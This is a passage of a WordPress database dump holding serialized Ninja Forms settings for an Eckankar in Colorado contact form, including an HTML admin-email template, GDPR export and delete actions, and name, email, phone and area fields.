Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:75;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:44:41\";s:5:\"label\";s:11:\"Admin Email\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:49:\"Northwest Mountain Area Initiators and ESAâs\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3928:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"10\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello! You have a new <span style=\"color: #23507d\">Northwest Mountain Area Initiators and ESAâs</span> form submission.<br /><br /><br />\r\n </strong><br /><br /><br />\r\n This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as a contact for theÂ <em>Northwest Mountain Area ECK Leadership organization</em>.<br /><br /><br />\r\n <strong><br /><br /><br />\r\nThe following person has requested contact with an ECK representative. Here is the information that <span style=\"color: #666666\">{field:textbox_154}Â {field:lastname_155}</span> has submitted:</strong></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_154}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_155}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_156}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_157}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_158}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:select_the_person_you_would_like_to_contact_1613166754232}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_162}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";}s:2:\"id\";i:76;}}s:8:\"settings\";a:40:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:43:\"Northwest Mountain Area Initiators and ESAs\";s:10:\"created_at\";s:19:\"2019-07-15 14:06:58\";s:10:\"form_title\";s:49:\"Northwest Mountain Area Initiators and ESAâs\";s:17:\"default_label_pos\";s:5:\"above\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2017-07-04 17:43:25\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";s:1:\"1\";s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:11:{i:0;s:8:\"html_153\";i:1;s:11:\"textbox_154\";i:2;s:12:\"lastname_155\";i:3;s:9:\"email_156\";i:4;s:9:\"phone_157\";i:5;s:14:\"listselect_158\";i:6;s:57:\"select_the_person_you_would_like_to_contact_1613166754232\";i:7;s:12:\"textarea_162\";i:8;s:18:\"html_1663800586504\";i:9;s:10:\"submit_164\";i:10;s:18:\"html_1663800583849\";}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:20:\"repeatable_fieldsets\";s:0:\"\";}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(20,'a:7:{s:2:\"id\";i:20;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:10:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1247:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1245:\"<p><h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Parker Initiators and ESA\'s</span></span></span></strong></span></h3>\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p><p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.</p>\";s:3:\"key\";s:8:\"html_165\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:11:\"field_label\";s:4:\"Text\";s:9:\"field_key\";s:8:\"html_165\";}s:2:\"id\";i:211;}i:1;a:2:{s:8:\"settings\";a:52:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:2;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:7:\"textbox\";s:6:\"def_id\";s:1:\"6\";s:5:\"label\";s:10:\"First Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"1\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:11:\"textbox_166\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:10:\"First Name\";s:9:\"field_key\";s:11:\"textbox_166\";s:21:\"custom_name_attribute\";s:0:\"\";s:23:\"personally_identifiable\";s:0:\"\";s:5:\"value\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:212;}i:2;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:3;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"lastname\";s:6:\"def_id\";s:1:\"7\";s:5:\"label\";s:9:\"Last Name\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:14:\"user_address_1\";s:0:\"\";s:14:\"user_address_2\";s:0:\"\";s:9:\"user_city\";s:0:\"\";s:8:\"user_zip\";s:0:\"\";s:10:\"user_phone\";s:0:\"\";s:10:\"user_email\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:12:\"lastname_167\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:11:\"field_label\";s:9:\"Last Name\";s:9:\"field_key\";s:12:\"lastname_167\";s:21:\"custom_name_attribute\";s:5:\"lname\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:213;}i:3;a:2:{s:8:\"settings\";a:48:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:4;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"email\";s:6:\"def_id\";s:2:\"14\";s:5:\"label\";s:5:\"Email\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:0:\"\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_phone\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"email_168\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:5:\"Email\";s:9:\"field_key\";s:9:\"email_168\";s:21:\"custom_name_attribute\";s:5:\"email\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:214;}i:4;a:2:{s:8:\"settings\";a:50:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:5;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:5:\"phone\";s:6:\"def_id\";s:2:\"15\";s:5:\"label\";s:5:\"Phone\";s:9:\"label_pos\";s:5:\"above\";s:4:\"mask\";s:14:\"(999) 999-9999\";s:10:\"datepicker\";s:1:\"0\";s:10:\"first_name\";s:1:\"0\";s:9:\"last_name\";s:1:\"0\";s:9:\"from_name\";s:1:\"0\";s:14:\"user_address_1\";s:1:\"0\";s:14:\"user_address_2\";s:1:\"0\";s:9:\"user_city\";s:1:\"0\";s:8:\"user_zip\";s:1:\"0\";s:10:\"user_email\";s:1:\"0\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:11:\"placeholder\";s:0:\"\";s:13:\"disable_input\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:15:\"input_limit_msg\";s:0:\"\";s:10:\"user_state\";s:1:\"0\";s:16:\"autocomplete_off\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:3:\"key\";s:9:\"phone_169\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:8:\"one-half\";s:10:\"manual_key\";s:0:\"\";s:11:\"custom_mask\";s:0:\"\";s:11:\"field_label\";s:5:\"Phone\";s:9:\"field_key\";s:9:\"phone_169\";s:21:\"custom_name_attribute\";s:5:\"phone\";s:23:\"personally_identifiable\";s:1:\"1\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:215;}i:5;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:6;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:15:\"Your Local Area\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:8:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc 